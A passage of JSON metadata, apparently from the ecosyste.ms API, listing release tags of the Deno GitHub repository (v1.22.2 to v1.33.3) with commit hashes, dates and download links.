/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https: